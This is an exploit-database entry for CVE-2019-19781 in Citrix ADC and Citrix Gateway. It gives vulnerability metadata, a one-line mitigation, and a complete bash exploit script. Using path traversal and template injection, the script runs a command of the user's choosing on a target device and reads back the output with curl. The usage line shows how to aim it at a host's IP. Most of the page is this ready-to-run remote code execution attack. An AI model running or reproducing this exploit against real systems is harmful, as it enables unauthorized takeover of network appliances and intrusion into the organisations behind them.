Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781

vendor:

Netscaler Gateway

by:

ProjectZeroIN

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Netscaler Gateway

Affected Version From: 10.5

Affected Version To: 12.1

Patch Exists: YES

Related CWE: CVE-2019-19781

CPE: a:citrix:netscaler_gateway:12.1

Metasploit: https://www.rapid7.com/db/vulnerabilities/citrix-adc-cve-2019-19781/, https://www.rapid7.com/db/modules/auxiliary/scanner/http/citrix_dir_traversal/, https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2019-19781/

Other Scripts: N/A

Platforms Tested: Linux

2020

Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway – CVE-2019-19781

This exploit is used to execute arbitrary commands on vulnerable Citrix Application Delivery Controller and Citrix Gateway devices. It works by sending a malicious HTTP request to the vulnerable device, which then executes the command and stores the output in an XML file. The output can then be retrieved by sending another HTTP request to the vulnerable device.

Mitigation:

Citrix has released a security advisory and patches to address this vulnerability. Users should update their systems to the latest version of the software.

Source

Exploit-DB raw data:

#!/bin/bash
# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
# Release Date : 11/01/2020
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
echo "=================================================================================
 ___             _           _     ____                 ___           _  _
| _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _
|  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
|_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
              |__/                                                 CVE-2019-19781
================================================================================="
##############################
if [ -z "$1" ];
then
echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
exit;
fi
filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
echo -ne "Command Output :\n"
curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is